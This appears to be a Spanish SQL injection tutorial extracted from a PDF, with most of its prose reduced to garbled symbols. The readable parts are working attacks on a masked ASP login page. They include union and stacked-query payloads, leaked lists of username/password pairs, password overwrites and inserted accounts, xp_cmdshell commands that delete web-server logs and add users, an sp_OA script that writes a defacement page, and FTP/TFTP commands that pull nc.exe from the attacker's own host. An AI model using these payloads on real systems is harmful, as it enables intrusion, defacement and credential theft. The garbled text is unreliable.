b.colorder = 48 --
7 " & 4 " 4 " + J . "
" " E! 4 9 " " " " " ) (
" > >F
! 6 " " " 7 " 4
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85
:M& 6 " :,-' " " 9 )
) # 5 :# " > " # )!% #, > % . " &
6 " . ;:! + " . " " " "
) " + "
:- .# ! #& +
5 ) & & + " 6 ( 9 " "
" . 6 " & ) " " ) " ) + "
"& " 9 ) 7 " " 6 . " 9
" " % . " & " " " #$% > 1 :1>&
D * ># EF> "
# ) " 1 :1 " " " " >) " "> 9 " *
. 4 #$%& " 9 " J " * "& " ) "
J 6 " ) " " ! 4 & " " J
1 :1& " " " > >& )
" " " " " ) " "
! " * # EF& " ) " 7 " .
" "
C
5 9 " " . ) " " 6 " "
( " 4 "& & " +
; " " 6 " 4 < + 7 " * 9
. " . "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y Y
Y H 9 6 " >! "" >
Y * . "
Y
H + L " " E ,F& & & * " "00
6 ( "& . 4 " " = 1
6 !:#; " " 6 )4 6 & ) " "
" . <
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85
- " " 6 9 6 :,-' " "
) " " & 4 6 "
" E> ,> " 4 F " " ) 9 "
I 8 " 9 " " " " 1:& 6 ( " "
& " 6 " " 9 = "
, ) 9 " " " " " )
) ( & "= & + )
2
" " 6 "& " ) * " (
" " #$% ) " " ) " E! " " " )4 6
#$%KK& IIF
8 "& " " " " " " &
" " " " " " #$% 1 :1& 9 4
" # + " " " & "
) ) " ( & ; !: ,8 ,5;: 9
" " " 9 " . " "
! " " . & 9 " 9 " " " + I
:M& < ' " 5 + " < =" >5 6 #$%
4 ` a>& #$% ># > 6
* & 6 " " & #$% " <
* " " 4 " 9 " " " " " " "
" " " 4 " * 9 " 4 " +
> ,>
8" " 4 " 4 6 9 " " 1H5 ' 5 EA " "
" " F " 6 #$% " " >9 4 > 7 " 9
. # 1H5 ' 5
- & . " " 6 " 6 7 " . " " " +
" " "& " . ) ) " "
#$% ! . * & )" 6 " 9 " 6
1 &( ! (!
# 5 :#
4 # #
" " " # )!% #,
" " " . " ,
" " " ! ) ! *
" " " ! * M
" " " ! * "
" " " ! <# "
" " " ! <1
" " " ! M
" " " % " # "
" " " ,
" " " , M
" " , E1 ) " F
" " #
" " !G# E' " D F
8
' 6 & " * * " ( " )
"& " " + " " "& . " " "
6 " < " ! & " > .
" D > > . > " E! .J F 9 "
& " " "& " " ) " 9 " .
" " " ) " ) " " " " ) "& + " "
" 6 " " > >& 9 ;:,5 * *
6 " )4 6 & b 1;5 >86 "&
, " ) + 8 > . " " " " 4
. " , & " & E% " 9
) 9 F . . 9 " +
" "
2
4; ! * #! ! !< !& ! (!
6 ( #$%& (
" " " . " * ) "
" )4 6 & ( . " " 7 " 9 " ) "
= (! , 8 .=
# . "& >) " > ) " " "
. & " " 9 6 ) "
" " A=4 " 9 * . " ) *
* 4 . " " "" ) " " 6 &
( 7 " " " "
> $6 3 / (! 6#; !
% " " " & " ( *
#$% . ) " 6 " 1;: 9 " .
" . " E% 9 " * 6 " 6 " ( F *
* " 6 " " " , + !G#
H 6 " " " F + 6 " * 9 ) =
6 !:#; +
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
2
H + L < 6 EB F " <VLL "
<V <[ [L L[ "[L]L* " " U < " < " <
< W
-> $6 3 , 8 . ! (! 6#; !
6 ( " " & " ) " +
#8%8'; ) ( 7
" "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. " Y
H + "L " <& & & * < 00
) ( " !:#; * & 6 :,-' 6 6
" " ) " 4 " * . ) " .
* * " " "
Login de Usuarios Registrados
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! & ! (! 6#; !
6 ( ) " " " ) " "& )
( " & " . +
, :!& " " " . 4
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
H + L] ) < 00
- 6! !
; " " " " " " " " . & " " "
" 6 " " " . 6 ) " " " " "&
"& 9 ( 6 " 9 . * &
" " 5 " " " "
" ) " " 9 " * & . .
. " " " ) " "
$+6 4
H " 4 9 " " " !:#; (
"" " . " " 6= + "
!,5;8
23
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L " " " "VL1 6 ! ""L VL' L00
+4 4 4
# & . " * " !:#; & . "
+ 9 E5 9 " *
9 " " #$% # 6 F . "
H + 'delete from usuarios where UID='Usuario'--
1 4
$ " 1#8 ;& ) " 9 " "
4 & " " 9 &
" " " "& " " 6 " 6 " "
" " 9 + . " " " !
& " " ) ( . & +
4 " & . " E' " 4
KKKF " = " ) " . 9 =
9 " " ( " 7 & 6 "
" " "& + . ( 9 " "
" )
2?
5"= " & " 9 < " " " " 1#8 ; "
" 9 " ) " & 4 * " + &
" . = 9 " " " "
( " !:#; 6= :)6 7< " +
. * 9 " + . &
" ) " " " " + " " " 6 " "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L] " " " 6 " EL + " L&L +! "" LF00
% & & ! !
" . " . " ! " )
( . " 7 " " " #$% 4 " " ( "
" " " * " * &
) " 6 " II * 6 1: " " .
& " " * " 9 " * #$% # 6
" >8< # ! "> "
< "
$ # ?4; $ #
% " " < " " " & ,%%L" 9 < " "
) " " " " & " "
" " 8< " " " " < "&
6 " #0#$%& " " ) *
" 5 . " "& #0#$% ) " ) .
2@
" " " < " "& "
" & * " ) ) " " " 9 "
5 ) " * " "& " " " " "
" " " " " " 9 " + " (
" " " < Q "
N Q " " 4 " " " 6 6= #$%
> " > " K 6 " ( = " " " " . "
4 " " ;;!
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + "L]8N8' " ) < Q " L < L00
:M ) " " " + * )
9 " 4 & " ) 4 " #5
E 6 " " " ) " ( < Q " F
, " * " " )" 6 " " "
= " ) " * " 6 > > . 9 "
) " * . " 6 " E8 " " & & & " & F
5 4 & 6 " . " " * " 9 "
" = 6 " " < Q " E/ " 1
) 4 " ) " " = "F
2
! "
EXEC master..xp_cmdshell 'dir c:inetpubwwwroot'
! 6 9 6
EXEC master..xp_cmdshell 'type
c:inetpubwwwrootalguna_pagina.asp'
! " )
EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe
c:inetpubwwwrootchroot.exe'
! ) "
EXEC master..xp_cmdshell 'DIR
c:winntsystem32logfilesw3svc1'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicación en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:winntsystem32logfilesw3svc1
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicación en
World Wide Web"'
! 6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
! " 6 G "
EXEC master..xp_cmdshell 'NET USER username password'
:M& " ) . " " >8< # ! ">&
" . " " " " >1
8< ">& " " ) 7 ) " & 4 "
" " " " # " + "
'exec master..sp_addlogin MyUser, MyPass
9 " . " " ) 6 & " "
; " * & . . " " ) " 9
" ) & " " " " " >#
! "> + >8< # ! "> 9 ) = " " ) "
" " " ! " " " " " & " * " +
= #0#$% # 6 " * " "
" " + " " " 6 " * "
2B
" Q
" Q
" Q " +
" Q * .
" Q " 6 )
" Q .
< Q ) "M
< Q .
< Q .
< Q . M +
< Q . 6
< Q" 6
< Q "
< Q
< Q 6 .
- $ % + )
% " & * " & " " " +
" " ) " " " + 7 " . " " #$%
4 & * + " ' " ) 4
) " " & 4 " " 9
* ( " " " ( 4
" > * >
% " 7 "& 9 " ( 67" #$% E$ +
+( 9 9 " < ) " " #$% 6=
:,-'F& " 9 " " #5& " )
" " 322& ) " . *
9 " # ) & " . " + " #$%&
. " .
- " " & 9 4 * "
1 & " . " > . (( # + ; >& "
M <& < " " 7 "
6 " H " . " * . "
----- Extracto ------------------------------------------
[...] La idea es crear una página html o asp, si en
el sitio objetivo se encuentra activo y funcionando un
webserver [...]
-- Uses the OLE Automation procedures to create a Scripting.FileSystemObject
-- inside the SQL Server process and write an HTML page, line by line, into a
-- web-hosting directory, i.e. a page defacement.
--   @o   receives the object token from sp_oacreate
--   @f   receives the text-file object returned by createtextfile (the
--        trailing 1 is its overwrite argument)
--   @ret receives each writeline call's return code; it is never checked
--   @t   is declared but not used in the lines shown
-- Defender note: 'Ole Automation Procedures' is off by default from SQL Server
-- 2005 on and the sp_OA* procedures are limited to sysadmin; leave both that
-- way, and give the service account no write access to web content.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:web-hostingattajdidindex3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "--
></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'
2C
-- Continuation of the same batch after the page break: further writeline calls
-- on the text-file object @f, each appending one chunk of HTML to the page
-- being written. @f and @ret are declared earlier in the listing, and @ret is
-- never inspected.
-- Defender note: every call here goes through sp_oamethod, so with
-- 'Ole Automation Procedures' disabled (the default from SQL Server 2005 on)
-- none of these statements runs; file-integrity monitoring on the web root
-- catches the resulting page change.
exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV
align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR> <TD bgColor=#d20000>&nbsp;</TD></TR>
<TR> <TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va
por vosotros!!!
</FONT></TD></TR> <TR> <TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000>&nbsp
;</TD></TR><!--" "--
></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'
Para subir archivos.- Creamos un archivo get.txt para
utilizar luego ftp
-- Builds an FTP command script on the database server with
-- Scripting.FileSystemObject (one writeline per script line), then has
-- xp_cmdshell run the FTP client with that script against NUESTROHOST ("our
-- host", a placeholder for a machine the author controls) to fetch nc.exe.
--   @o / @f  object token and text-file object, as returned by the sp_OA* calls
--   @ret     return code of each writeline, never checked
--   @t       declared but not used in the lines shown
-- Defender note: a database server rarely needs outbound FTP, so egress
-- filtering blocks this transfer; a command shell or FTP client started as a
-- child of the SQL Server process is a high-signal detection. Both primitives
-- used here (OLE Automation procedures, xp_cmdshell) are off by default from
-- SQL Server 2005 on.
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user
anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get
nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master.xp_cmdshell 'FTP -s c:get.txt
NUESTROHOST'
o algo más fácil si tenemos un tftp en nuestro host
-- Same file-staging idea with the TFTP client: xp_cmdshell runs a binary-mode
-- (-i) GET against NUESTROHOST, a placeholder for a host the author controls.
-- Defender note: TFTP is unauthenticated UDP; block it outbound from database
-- servers and alert when the SQL Server process starts a TFTP client.
EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET
c:mi_local_file c:remote_file'
3
----- Extracto ------------------------------------------
:M& ) & ) " " ( " * "
" )4 " . " " " 6 " " #0#$% # 6 &
6 " *=" " 9 " ) " .
" " " 8 " " & " " Q + " Q 9 "
" . " )4 :%8 " " * #$%
# 6 E " 4 " . * "+" )4 F + " 7 "
" " . )4 6 " ) "
;
" Q . & c " &
)4 M : ;! ;
` & < a
;
" Q )4 M &
` & 6 : ;! ; a
` & ` V a ` : ;! ; a
` a a
" 3 , +
# ) " " " & 9 #0#$%
" ) " " 9 " 7" " " "& )
9 " . " " & " * " &
9 ) 4 .J 6 " " J " " ) "
7 " #$% 4
! " 9 " D " + #$% 9 6
" ) " " " ) < " 6
& + = " ) " " " " ( " E: ) = "
"IF & " + * " " "
) * " 6 " . & " " #$% + "
5 ) "
* . >; : G ) 5 # + ! 4 > "
" 7 . " " ) " " #$% 4 +
" ) " " " " "
0 *
# L 1;: : ;A %8L
' > >
% + = " " + ) = " " J " " "
3
0 3 !
# )" " " ) "
1 :1 " )
H " " " E *Q* KF
1 " J " " "
0 +,-
# )" " " ) "
1 :1 " )
! " 5 "
1 " J " " "
0 $ .
# ':!S E8 " " F
# )" " " ) "
1 :1 " )
! " 5 "
J " " " " " ) "K
0
# )" " " ) "
1 :1 " )
! " 5 "
J " " " " " ) "K
" " " " " " " *
E< Q " & " Q " F
"@ % &
A . & 6 " . * % " " "
9 " " " * " ( ".
* & " " 6 ) " " #0#$% "
7 " 4 " "
' " " & " " & " "
. " . "& " " " " " ) ) )
" .
7 . " ( 6 # 6 ! M " "
6 " " 9 " " 6
7 . " ( " J " " " " 6
" " 9 " " 6
! 4 *=" " " " 6 " ) " "
8" ) ( ! = ' ( A " 6=
# * * " " < " " = " 8"
+ " ;'! 322 + ,! 323F
1 " " 6 " ) " " 6 ) " "
1 " " = & " 6 #$% " 6
" "
3
! " " " . " . * . E, " 6 "
) " " " " . ( & M" )
* . F
H * 9 6 " " "
" " #0#$% # 6
8" ) ( " 6 . " "& " ) " " 9
( " " " "
8" ) ( 6 " " . 6 " * " *
E " " " . ) 0 " " "
* ( " M " " MF
8" ) ( "" * #5
# " 9 " . & " " "
* " . " 6 #0#$% 6 '
1 4 ) ) " " 6 " "
" " " " . " (
" . " H 6 ) "
" ) " " ' 9 " " " " " " "
" " >$ > " " " 9 " " . ) " "
"A % B !
#0#$% # 6 " " & + " " ) " 7 " +
6 " " 6 " . " . " " " * " " "
" . & 9 9 " ) " " " " " ) + + " ( "
. 6 ( " " " " ) 4
" " " " " 6 " " " .
' " * & " " 9 . "
6 " " " 6 & < " " ) " " "
" . + " " " " 9 + = " " "
6 " ) " & " ) < 7< " + " " 7 "
M . " ) #0#$% # 6
8 " " " . "& "
" + "* ( " " A " "&
" " + # 6 " ! M" = & * . " " " 6
" ) " "& " . * " *
6 " " . G " & " ) " " 6 " " "&
" " " " ) > .= " ) " .
" . > + " " " " ) " " . &
) = 6 " #$% 4 . *= 4
# ) * " " & 74 " 6 " "
* M . * " G " 8 " & "
" " * "& " " " " " + " " " . *
) = " . " " " "
6 ) " 6 " E; " " #0#$%F 8"
) " " " " 9 " . " D " " . * )
" . ( # #;8 5 G "
32
' 6 G " 2& + " " " ) " 9 " "
" " ) " " " .
E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7
%81;: " * " ( " " "
" * & " " 9 " . ) "
" #0 #& #0#$%& # " " 8 !& " " ) ( "
* & " . & + 9
#:- 8 " " 6
5 " " 9 + "* " + 9 " )
" " " " " + " 6 " " & "
" " 7 " 5
" 6 " . " " 7 " #$% 4 & 6
9 6 " " > * " + % " ' ">
" " 9 " < 6
# " "& + " " <
5 " >5 . ! >
"C ) * # % & ! &
- M > M . 8< " G " > E #-1 B303B 022CB0@F
" M . M " Q QG "
"9 "9 Q 3
"9 " +
" * "9 6 6 " + "
" + " " #$% 4 G ! *
" " "
.Q#$%Q# 6 Q " .Q#$%Q 4 *
< . "" " 6 Q"9 Q 4 *
< . "" " Q 6 Q"9 Q 4 *
< . "" " 0#$% *
< . "" " M .0"9 0 "" " *
< . "" " 6 .Q ) " Q" + *
" " + 6 " ?,! 1 ! @8
" . " Q6 "9 "
"D !
M <
M " " + * " M M
M " " + . ' M " #9 )* (
33
M " " + . 1; " " #9 M (
M " " + . G "9 <
M " " + . G "9 . (
M " " + + . ) 5 "0 0 @0) (
<< "
" " " * "
"
" M " " MQJ "
+ " ; "
" B % ! (
01 ( , :! " 9 " " )+ 1
0 " . II )+ 5 .
0' ' % . " " F )+ 6
0S " * " ) " "
" ) "I )+ 5 . 59 =
6. &
** " * . & " " 9 " "
= " * " " 6 = " " " " " " (
. 6 . (( # + ; &
" . " > > < 1 ) 9 " * " 9
= = & + 9 " ) " " "&
" * 9 . " " + 9 " < " ) " " "
" " " ) " " )
8 " . . & . ( " " " 6 " " " "
D " 1 + 6 9 " "* ( " "
" * . 9 " " ") ( " " "
" * "
; ) 7 . " = + # 9 " " " "
" #0#$%& . " " " " .
/ " 9 " 9 67" " " " " " + *
" " " #$% 4 E8" . O1 <
/ # + # * % d " " " J "KF
! & . " " 9 " . " " "
" " " " . * & < " 9 D
5 " >5 . ! >

Tecnicas de sql injection

  • 1. !
  • 2. ! " #$%& ' ( ) " * + " ,- # . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' " - " " 3 #$% 4 ) 5 , ! ) % " " 5 " 67" ) " " " . " * 8* " ! 6 . " . 5 9 " , # #$% 4 :) * * + ;7 " / # . ; , " 8< + " " = " " " ) " >; ) - " .> 5 " , " 4 ' " ; " 4 # ! " 8< # ! " 4 ! ' , * ? #$% 4 : " - " " , " @ ' " ' " " A " B * " + % " ' " C ; " A " " ' ) " 5. " "" # 8 " )4 * " & " 7 " " " ( D # ) + = * 6 " " " " " ) & " + 6 9 & 6 & " . " + " " . ! & 9 " " " " 6 ( " " " . " & . " " 4 " " " "& "= 7 " + " ( " 7< " ) " . (( # +
  •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
  •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
  •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
  •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
  •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
  • 8. B 3 % & T 9 U + 9 TU , " TV . 9 UV + . 9 V . 9 -8;G881 ( " * 6 6 " % R8 ( 1 ( " * . " " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " . " " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 ) & " . 4 #$%& " * 9 4 " " "& " 9 " " * " " " + 4 " #$% " & " " " 4 " ! . * & = " " * 4 " ) & " " " " 4 " " & 4 # ) " & " 6 " & " + " " 9 6 " . " & " " " 6 " 9 9 7 + #$% " " ) "5 # # 6 7 " 9 . ( . * " 9 "& " . " = " . " " >5 9 " H ) " ' 8 >& " 9 * 6 & " " 9 " ) & & " " " #$% ) "&
  •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
  • 10. 8 9 + = " " " ) ) " ) 9 ( 6 & " 9 ) 4 " " " 9 " 9 " " " " 8" " ) 9 + = " " "& " 6 " 6 ) " "& ) " " 6 " & " " 6 " 6 ) " " " " 6 " " 6 )& " 9 ) 7 " * " " " ) " " ; " " " * " )& " " : % & " " " & " " " " 6 "& + " ) * " * " " 6 ) . " " ) " + " D :M& " ) 6 " * + = " " " " 9 " " . ) " " ) M. & " . < " " " + " " * " " 8 "& ) . ( ) " " " ) .J " " " * & 6 ( = " = " 6 " . " ) " . " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . . & ) " " " " . " " . 5#! 9 " " 6 " & ) " " E! + J " " ( ) * ; %& 9 . 5#! " < ) " "& . " " " . " " * ; % + 6 6 " " F 8 * 6 + ) ) & * & " . " " + 6 . "= select * from users where username = _UserName and password = _Password 5 ) 9 " " " " & ( " " " . & * " 6 " " " . "II ) " " "= + & " . " " 6 6 4 & " " &
  • 11. + ) ) " " ) " < " % " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " % = ) " " " " " 9 + " . " " ) + ) " " " .= EN,F ) 7 " " L1 6 ) L " " " 6 . 5#! 9 " 8 " " & + ) ) ) 4 . . ) " " " "* " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " & " 9 ) " " " * " " ) " #$% > 6 >& = " " 9 " . * 7 " " . & + . " + " + 9 ) " " " " " & " " " 9 + #$% 5 6 " " " * " " 4 " " " & " " ) " " + " ! & " " L E' # F ( " " " ) " " ( ) 4 " ) + . % L E' # F " " * #$% # 6 * "& " 9 " 6 9 " 4 " * " 9 6 & " 9 " " " " ) 9 + #$% H " 4 9 = " " " " " . ) ( * . " + ) " " " & " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD'
  • 12. select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " " 9 " 9 " " " " " " " #$% # 6 & " 9 " & " 9 " . " . ( " " + " . " username = 'An' edicion = 'N' % . & " . 9 " . " * " "& #$%& * " ( & 4 " " " & " 9 9 9 " " " " + & " . * #$% # 6 5 ) 9 " = " " . + * . " 9 " " " L5 L + L1L II 8 " & . " " 6 " 9 9 " .J 6 6 67" ) " " + " " * " " 4 " * " %& " " " ) "& " " ( 6 & ( . " 8" " * 6 & " 6 9 " " " " " " " " )4 6 + ) 4 " " " " )" " ) " " . " . & " " " " " " " 6 "& " * " 9 " . ) " " 8 * 6 & 9 " " " . " " & " " 6 6 . & ) ) . " .J . 7< + . ) A ) = " ) 7 & " " " " 6 " & 9 " " E84 " " ? >8 # 6 >F " 6 " " ) 7 " " . & 9 + #$% " 6 ) " " 9 "& 9 " < 9 ) " " ) 4 + " ( 7 " " " " ' " ' & " ) 4 > . #$% # 6 " . #$% 4 > EH B * " + " "F ( ( 9 " " * . 6 ) " 9 " . " <
  •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
  •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xtracto ------------------------------------------- <FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"
  • 15. ? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------- ! " 9 * ( = & ; % " "& + " 4 . 5#! E! " " & . " " F 5 ) & " " 9 ) 4 ( . " " & " 9 6 " " " " " "& " " " 9 * #$% " 6 " " ) " ) . 9 + " 6 " " select * from users where username = 'Angel' and password = '338xD' ! " " 9 " " + "" 9 . ) < " ) " " 9 ( " * 9 = 6 ( 6 ) " " ) * " " ) #$% 4 " I :M& 6 " " * = " " + . " " " + " D . " 